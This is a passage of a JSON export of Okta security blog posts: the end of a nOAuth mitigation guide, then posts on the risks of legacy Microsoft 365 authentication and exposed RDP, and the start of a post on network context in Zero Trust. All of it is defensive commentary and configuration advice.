This will be the Client ID for the Application you created in Okta.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iat (issued at time) claim indicates when this ID token was issued, expressed in Unix time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The exp (expiry time) claim is the time at which this token will expire, expressed in Unix time. You should make sure that this time has not already passed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nonce claim value should match whatever was passed when you requested the ID token.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iss (issuer) must be validated to make sure the org (tenant) that generated the JWT is the one you actually trust; a token minted by a different tenant must be rejected even if its email claim matches one of your users, which is exactly the cross-tenant condition nOAuth exploits.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve also introduced two capabilities to our Customer Identity Cloud (CIC) to reduce the attack surface. 
For starters, we default to setting the email_verified claim to “false” for users:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7BnwEU2Kd0VU7NJSh4l4rT\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CIC has also implemented an email verification flow:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6kYRT9hlPgmFZJyslV0pRN\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a customer takes the steps listed above, a nOAuth attack will be stopped at this screen:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4CJvacI3ZHei2GNwrt9Ytp\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This can be a simple (yet effective) way to avoid this type of account takeover. If your application requires that the emails from an Azure AD/ADFS connection's users are always verified, you can enable the “enable email verification” flow during login for Azure AD and ADFS connections option in the tenant's Advanced Settings section.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After the user authenticates for the first time with a non-verified email, CIC will then ask the user to verify their email by entering a one-time-use code that will be sent to their email account. 
If the user completes this step, the email_verified field will be set to true, and users will not be prompted again for email verification, unless Azure AD or ADFS return a different email for the user.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And there you have it, tools and tips you can use in your Okta environments to help mitigate the nOAuth vulnerability. As always, regularly testing and validating your identity program is a critical step for your overall security health, we hope you’ve found a few things you can implement today.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T22:35:22.483Z","secAuthor":[{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"<p>Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.  
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/legacyauthrisk","id":"6123a432-3e86-5286-864d-a0cd9efca658","title":"Just How Risky is Legacy Authentication?","date":"2022-01-27T06:19:29+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Does your organization still allow users to authenticate to Office 365 or other Microsoft services using only a username and password?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you do, you’re \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/businesses-at-work/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"53x more likely to be targeted in credential-based attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". (No, not 53% more likely. It’s 53 times more likely).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many organizations (at least one in ten Microsoft customers, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"as of October 2021\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") still allow access to the M365 cloud using what Microsoft calls “Legacy Authentication”. In these requests, the client forwards the username and password with the request to the cloud service provider during sign-in. 
There’s no OAuth2 compatibility, which means no opportunity to apply multi-factor authentication or the rich variety of access policies designed to protect users from common credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Accounts using legacy authentication are easy pickings for attackers. Billions of stolen usernames and passwords from previous breaches are freely available on online forums (and routinely refreshed for a fee). The “point and shoot” tools to re-purpose them in credential stuffing attacks are cheap and easy to source.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential stuffing is a reliable form of attack because the best of us - even when \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://haveibeenpwned.com/Passwords\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"we know\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" we shouldn’t - reuse passwords across different services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The tools used in credential stuffing and password spray attacks are in the armoury of every category of attacker, and it isn't limited to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://ag.ny.gov/press-release/2020/attorney-general-james-gets-dunkin-fill-holes-security-reimburse-hacked-customers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"those motivated by profit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In April 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa21-116a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"warned\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that the SVR, Russia’s Foreign Intelligence Service, has been targeting M365 accounts with legacy authentication enabled using “low and slow” password spray attacks since at least 2018.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Compromised victims had:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication.\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FBI noted that this was:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In October 2021, Microsoft \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"warned its customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that attackers linked to the Islamic Republic of Iran compromised ~20 organizations in credential stuffing attacks, again by targeting Office365 tenants that 
allow legacy authentication. Alarmingly, these attackers appeared to have hit a success rate close to 15% (cybercrime groups are known to profit at success rates far lower than 1%).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So this year, when I was asked to provide some observations about the threat landscape for Okta’s annual \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/businesses-at-work\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses At Work\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, I recommended they focus on this well-known risk that continues to go unaddressed in too many places.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"My colleague Matt Shancer calculated how often \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" flagged legacy authentication requests as suspicious, and compared that to requests made using modern authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight, for those unfamiliar, is Okta’s native capability for detecting high-volume credential-based attacks. 
Customers can configure ThreatInsight to block these requests before the attacker gets the chance to authenticate.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7f11xiJ0UZysW6djYyhNag\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The results were emphatic. ThreatInsight detections fire far more often on requests made to M365 using legacy authentication. Adversaries specializing in high volume, credential-based attacks (“account checking” services, so to speak) are targeting these services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is only one \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"measure of how often these services are targeted\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". We can confidently say that there is a material reduction in risk available to organizations that disable legacy authentication: while the numbers vary by industry, we found that the average reduction in the ratio of detected threats to legitimate authentications exceeds 99%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This reduction in risk is amplified when you add the protection multifactor authentication and risk-based access policies offer your users. 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.google/pubs/pub48119/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Academic studies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have demonstrated that risk-aware MFA blocks 99.9% of automated, credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So if you’re looking to prioritise security projects proven to reduce the risk of compromise, this is an obvious one. Microsoft has (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://redmondmag.com/articles/2021/02/04/microsoft-rethinks-plans-to-block-basic-auth.aspx\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"again\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") set a new date for when it intends to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bleepingcomputer.com/news/microsoft/microsoft-will-disable-basic-auth-in-exchange-online-in-october-2022/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disable legacy authentication to Office 365\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": October 1, 2022. Every customer of Microsoft cloud services should be assessing their exposure to legacy authentication over the weeks ahead. This requires making sure modern authentication is enabled \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"AND\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that legacy authentication is disabled.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This post is the second in a three-part series. 
See our first post, \\\"\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2021/09/auditing-your-okta-org-legacy-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auditing your Org for Legacy Authentication\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\\"\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:59:41.448Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/weneedtotalkaboutrdp","id":"17e5afad-c9d2-57df-81e3-7fe45fa3aefc","title":"We (still) need to talk about RDP","date":"2022-03-08T07:48:54+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Quarter by quarter, for three years now, abuse of Remote Desktop Protocol (RDP) has been the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.coveware.com/blog/2022/2/2/law-enforcement-pressure-forces-ransomware-groups-to-refine-tactics-in-q4-2021\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"most common root cause\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of all ransomware events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s no surprise why RDP makes for an attractive target: RDP is the primary vehicle for remote access to Windows servers and is used for administrative functions. 
It’s the most \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://resources.digitalshadows.com/whitepapers-and-reports/initial-access-brokers-report\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"commonly listed method of remote access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" sold by initial access brokers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"According to some \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-rdp-exposed-the-threats-thats-already-at-your-door-wp.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2019 research [pdf]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Sophos, an open RDP port gets its first connection request somewhere between 90 seconds and 15 hours of being exposed on the internet. Brute forcing RDP is so easy, the researchers noted, that “the criminal gangs who conduct targeted ransomware attacks have almost entirely abandoned alternative methods of network entry.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“In recent years, criminals deploying targeted ransomware like BitPaymer, Ryuk, Matrix, and SamSam have almost completely abandoned other methods of network ingress in favor of using RDP. Gangs like these have the choice of cracking passwords themselves using tools like NLBrute, buying passwords cracked by others, or buying accounts on compromised RDP servers.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The situation hasn’t improved much since then. 
According to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa22-040a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"joint statement\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" released by authorities in the US, UK and Australia in February, ransomware actors assumed that organizations rushing to provide remote access during the first COVID lockdowns would misconfigure RDP. And oh boy, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"were they right\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All that said, I’ve never been 100% sure about whether there were systemic reasons that made RDP so prone to abuse. Surely, by now, after these hundreds of awareness campaigns and news articles, the collective hygiene practiced by systems administrators has improved to make this sort of abuse less effective?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today there are a larger number of methods for discovering rogue servers and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/video/okta-advanced-server-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"locking down RDP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", while the risks of leaving RDP unprotected have only increased. And yet we aren’t seeing a downward trend in the number of exposed endpoints (or compromised networks) stemming from abuse of RDP. I don’t want to give in to the temptation of just putting it down to “lazy admins” and “miserly CIOs”. 
There has to be more to it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1ksAT1R3oFnjWb3u5yAQ7p\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Source: Shodan.io\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By a “systemic” reason, I mean a set of conditions that lead to poor security outcomes, as opposed to a specific vulnerability. A systemic reason might be insecure defaults, for example, or indecipherable documentation. It might be essential security tasks that require additional “premium” licenses or for settings to be configured in multiple admin consoles. It’s often a combination of those things.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recently a few observations made it all click for me.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first came courtesy of a former Microsoft security engineer dropping a truth-bomb on Twitter. 
RDP is usually abused using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/gossithedog/status/1490744610469076998?s=21\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"brute force attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", he noted, because there aren’t any out-of-the-box ways to apply rate limiting to RDP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“An entire and large part of the ransomware economy is this singular issue.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And just as I was getting my head around how Microsoft would go about applying rate limiting in a server OS (it’s not trivial), my former colleagues at the Risky Business podcast published a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/HF15/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"groundbreaking interview\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with Michael Montaya, CISO of Equinix. Montaya rather bravely gave Risky Business a blow-by-blow account of a ransomware incident at the company. 
The beachhead for the attack was a brute force attack on an unsanctioned server with RDP exposed to the internet.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The configurations that come out of the box in the cloud don’t always follow best practices,” Montaya explained.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you combine the constrained ability of security teams to discover open RDP ports in unsanctioned infrastructure, and the unconstrained ability for attackers to test stolen credentials against clients with RDP exposed, it starts to take the shape of a systemic problem.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.shodan.io/search?query=port%3A3389+%22administrator%22\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"glance at where you find the most Windows servers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with RDP open to the internet, it doesn’t marry closely with market share. There seem to be disproportionately more vulnerable servers hosted by managed service providers that rent access to Windows VMs as a “cloud service”. The default settings at these service providers are worthy of analysis.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this context, it’s just a little tiresome to keep chalking up abuse of RDP to “poor user credential hygiene”. That’s the sort of cop out that’s enabled initial access brokers and ransomware affiliates to thrive for the past five years. 
Our services should, at some level, be configured to anticipate and expect that users will practice poor credential hygiene. At the very least, service providers should offer VMs with inbound connections over RDP blocked by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keep beating that drum\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the known conditions that make RDP so vulnerable, we unfortunately need to keep hammering home the message that admins should avoid exposing RDP to the internet in the first place - even if a lot of people are sick of hearing about it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inbound connections via RDP should be limited to trusted network sources and protected by multifactor authentication. In a true “zero trust” context, that means MFA is applied even when the admin is already on the network. Better yet, the only trusted source should be a jump host/bastion host that admins must authenticate to first. All authentication via RDP should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"logged and monitored\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for large numbers of unsuccessful logins.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If remote access is absolutely required, an admin should first have to authenticate via a gateway. 
Bonus points if the solution involves “just in time” access - that is, ephemeral credentials for every session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These controls aren’t so difficult to implement, but they can be difficult to sell into IT admins that complain loudly about the slightest inconvenience.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In infosec we expend a lot of time and investment in mitigating numerous “theoretical” risks. It’s disappointing that something as commonplace as the abuse of RDP isn’t flashy enough to warrant more energy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So “once more unto the breach”, my infosec friends, there are better ways to secure remote access.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:59:00.307Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/03/protection-without-perimeters","id":"f494a463-6f7c-5d76-96d1-1b2f478a57f1","title":"Protection, without perimeters","date":"2022-03-14T00:47:12+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the premise that “identity is the new perimeter”, we’re often asked about the role network attributes should play in restricting access to applications, servers and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Can we, and should we, for example, deny access requests originating in high-risk countries or countries involved in conflict?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The reality is that network context still matters. We can take into account the identity of the network and location our users are authenticating from. 
If a customer determines that there are no authorized users in a region or country, a least privilege approach might warrant a decision to not allow networks from that region to connect to its applications and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The network source of an access request is one of the many attributes that can be dynamically evaluated prior to or during authentication as part of a “Zero Trust” approach to security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta, the building blocks of this assessment are what we call \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/Security_Network.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network 